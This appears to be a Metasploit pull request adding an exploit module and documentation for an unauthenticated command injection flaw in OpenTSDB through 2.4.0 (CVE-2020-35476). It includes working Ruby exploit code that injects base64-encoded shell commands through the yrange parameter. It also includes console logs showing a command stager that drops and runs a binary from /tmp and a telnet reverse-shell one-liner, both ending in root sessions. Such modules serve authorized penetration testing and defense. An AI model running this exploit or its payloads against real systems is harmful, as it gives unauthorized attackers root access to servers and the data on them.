### PR TITLE
Add opentsdb_yrange_cmd_injection module and docs

### DIFF
--- a/documentation/modules/exploit/linux/http/opentsdb_yrange_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/opentsdb_yrange_cmd_injection.md
@@ -1,0 +1,149 @@
+## Vulnerable Application
+This module exploits an unauthenticated command injection vulnerability in the yrange parameter
+in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user.
+
+The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower,
+the module performs additional checks to obtain the configured metrics and aggregators.
+It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph.
+As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable.
+
+This module has been successfully tested against OpenTSDB version 2.3.0.
+
+## Installation Information
+OpenTSDB is open source software. Vulnerable releases are available [here](https://github.com/OpenTSDB/opentsdb/releases).
+Documentation and installation instructions are available [here](http://opentsdb.net/docs/build/html/index.html).
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/opentsdb_yrange_cmd_injection`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `set SRVHOST [IP]`
+6. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to OpenTSDB. The default value is `/`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Automatic (Unix In-Memory)
+1   Automatic (Linux Dropper)
+```
+
+## Scenarios
+### OpenTSDB 2.3.0 - Linux target
+```
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options
+
+Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      4242             yes       The target port (TCP)
+   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0
+                                         .0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to OpenTSDB
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
+   LPORT  1312             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Automatic (Linux Dropper)
+
+
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.10.1.30:1312
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
+[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.min
+[*] Identified 31 configured aggregators. Using aggregator sum
+[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgoHJWgCAAUgieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/XeJKe.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/JIulg' < '/tmp/XeJKe.b64' ; chmod +x '/tmp/JIulg' ; '/tmp/JIulg' & sleep 2 ; rm -f '/tmp/JIulg' ; rm -f '/tmp/XeJKe.b64'"]
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (1017704 bytes) to 10.10.1.1
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Meterpreter session 4 opened (10.10.1.30:1312 -> 10.10.1.1:47720) at 2022-11-24 19:27:06 +0000
+
+meterpreter > getuid
+Server username: root
+```
+
+### OpenTSDB 2.3.0 - Unix target
+```
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options
+
+Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      4242             yes       The target port (TCP)
+   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
+                                         .0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to OpenTSDB
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
+   LPORT  1337             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Unix In-Memory)
+
+
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run
+
+[+] sh -c '(sleep 3851|telnet 10.10.1.30 1337|while : ; do sh && break; done 2>&1|telnet 10.10.1.30 1337 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 10.10.1.30:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
+[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.mean_rate
+[*] Identified 31 configured aggregators. Using aggregator max
+[*] Executing the payload
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo q08IVzJKPKz8soea;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "q08IVzJKPKz8soea\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 3 opened (10.10.1.30:1337 -> 10.10.1.1:52370) at 2022-11-24 19:24:06 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```

--- a/modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb
+++ b/modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Connection failed.')
     end
 
-    unless res1.code == 200 && res1.body.include?('<title>OpenTSDB</title>')
+    unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')
       return CheckCode::Safe('Target is not an OpenTSDB application.')
     end
 
@@ -114,10 +114,15 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     begin
-      version = JSON.parse(res2.body)['version']
+      parsed_res_body = JSON.parse(res2.body)
     rescue JSON::ParserError
       return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
     end
+
+    unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')
+      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
+    end
+    version = parsed_res_body['version']
 
     begin
       if Rex::Version.new(version) <= Rex::Version.new('2.4.0')
@@ -125,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
       else
         return CheckCode::Safe("The target is OpenTSDB version #{version}")
       end
-    rescue StandardError => e
+    rescue ArgumentError => e
       return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")
     end
   end

--- a/modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb
+++ b/modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb
@@ -1,0 +1,242 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection
+          vulnerability in the yrange parameter in OpenTSDB through
+          2.4.0 (CVE-2020-35476) in order to achieve unauthenticated
+          remote code execution as the root user.
+
+          The module first attempts to obtain the OpenTSDB version via
+          the api. If the version is 2.4.0 or lower, the module
+          performs additional checks to obtain the configured metrics
+          and aggregators. It then randomly selects one metric and one
+          aggregator and uses those to instruct the target server to
+          plot a graph. As part of this request, the yrange parameter is
+          set to the payload, which will then be executed by the target
+          if the latter is vulnerable.
+
+          This module has been successfully tested against OpenTSDB
+          version 2.3.0.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Shai rod', # @nightrang3r - discovery and PoC
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-35476'],
+          ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 4242
+        },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'CmdStagerFlavor' => %w[bourne curl wget],
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Automatic (Linux Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-11-18',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),
+    ]
+  end
+
+  def check
+    # sanity check to see if the target is likely OpenTSDB
+    res1 = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    unless res1
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res1.code == 200 && res1.body.include?('<title>OpenTSDB</title>')
+      return CheckCode::Safe('Target is not an OpenTSDB application.')
+    end
+
+    # get the version via the api
+    res2 = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'version')
+    })
+
+    unless res2
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res2.code == 200 && res2.body.include?('version')
+      return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')
+    end
+
+    begin
+      version = JSON.parse(res2.body)['version']
+    rescue JSON::ParserError
+      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
+    end
+
+    begin
+      if Rex::Version.new(version) <= Rex::Version.new('2.4.0')
+        return CheckCode::Appears("The target is OpenTSDB version #{version}")
+      else
+        return CheckCode::Safe("The target is OpenTSDB version #{version}")
+      end
+    rescue StandardError => e
+      return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")
+    end
+  end
+
+  def select_metric
+    # check if any metrics have been configured. if not, exploitation cannot work
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'suggest'),
+      'vars_get' => { 'type' => 'metrics' }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")
+    end
+
+    begin
+      metrics = JSON.parse(res.body)
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')
+    end
+
+    unless metrics.is_a?(Array)
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')
+    end
+
+    if metrics.empty?
+      fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')
+    end
+
+    # select a random metric since any will do
+    @metric = metrics.sample
+    print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")
+  end
+
+  def select_aggregator
+    # check the configured aggregators and select one at random
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'aggregators')
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")
+    end
+
+    begin
+      aggregators = JSON.parse(res.body)
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')
+    end
+
+    unless aggregators.is_a?(Array)
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')
+    end
+
+    if aggregators.empty?
+      fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')
+    end
+
+    # select a random aggregator since any will do
+    @aggregator = aggregators.sample
+    print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    # use base64 to avoid special char escape hell (specifying BadChars did not help)
+    cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'"
+    start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data
+    start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')
+    end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data
+    end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')
+
+    get_vars = {
+      'start' => start_value,
+      'end' => end_value,
+      'm' => "#{@aggregator}:#{@metric}",
+      'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]",
+      'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",
+      'style' => 'linespoint'
+    }
+
+    exploit_uri = '?'
+    get_vars.each do |key, value|
+      exploit_uri += "#{key}=#{value}&"
+    end
+    exploit_uri += 'json'
+
+    # using a raw request because cgi was leading to encoding issues
+    send_request_raw({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)
+    }, 0) # we don't have to wait for a reply here
+  end
+
+  def exploit
+    select_metric
+    select_aggregator
+    if target.arch.first == ARCH_CMD
+      print_status('Executing the payload')
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(background: true)
+    end
+  end
+end


### PR DESCRIPTION
## About
This change adds an exploit module and docs for an unauthenticated command injection vulnerability in OpenTSDB through 2.4.0 (CVE-2020-35476).

## Vulnerable Application
OpenTSDB through 2.4.0 is affected. However, the module has only been tested against 2.3.0

## Installation Information
I wrote this module using a target I had access to for limited time only. I did try to set up OpenTSDB locally but it kept throwing weird errors when I tried to add data, which is required for exploitation to be possible. In any casevulnerable releases are available [here](https://github.com/OpenTSDB/opentsdb/releases).
Documentation and installation instructions are available [here](http://opentsdb.net/docs/build/html/index.html).

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/opentsdb_yrange_cmd_injection`
3. Do: `set RHOSTS [IP]`
4. Do: `set LHOST [IP]`
5. Do: `set SRVHOST [IP]`
6. Do: `exploit`

## Options
### TARGETURI
The base path to OpenTSDB. The default value is `/`.

## Targets
```
Id  Name
--  ----
0   Automatic (Unix In-Memory)
1   Automatic (Linux Dropper)
```

## Scenarios
### OpenTSDB 2.3.0 - Linux target
```
msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options

Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      4242             yes       The target port (TCP)
   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0
                                         .0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to OpenTSDB
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
   LPORT  1312             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Linux Dropper)


msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.1.30:1312
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.min
[*] Identified 31 configured aggregators. Using aggregator sum
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgoHJWgCAAUgieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/XeJKe.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/JIulg' < '/tmp/XeJKe.b64' ; chmod +x '/tmp/JIulg' ; '/tmp/JIulg' & sleep 2 ; rm -f '/tmp/JIulg' ; rm -f '/tmp/XeJKe.b64'"]
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (1017704 bytes) to 10.10.1.1
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 4 opened (10.10.1.30:1312 -> 10.10.1.1:47720) at 2022-11-24 19:27:06 +0000

meterpreter > getuid
Server username: root
```

### OpenTSDB 2.3.0 - Unix target
```
msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options

Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      4242             yes       The target port (TCP)
   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
                                         .0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to OpenTSDB
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
   LPORT  1337             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run

[+] sh -c '(sleep 3851|telnet 10.10.1.30 1337|while : ; do sh && break; done 2>&1|telnet 10.10.1.30 1337 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 10.10.1.30:1337
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.mean_rate
[*] Identified 31 configured aggregators. Using aggregator max
[*] Executing the payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo q08IVzJKPKz8soea;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "q08IVzJKPKz8soea\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (10.10.1.30:1337 -> 10.10.1.1:52370) at 2022-11-24 19:24:06 +0000

id
uid=0(root) gid=0(root) groups=0(root)
```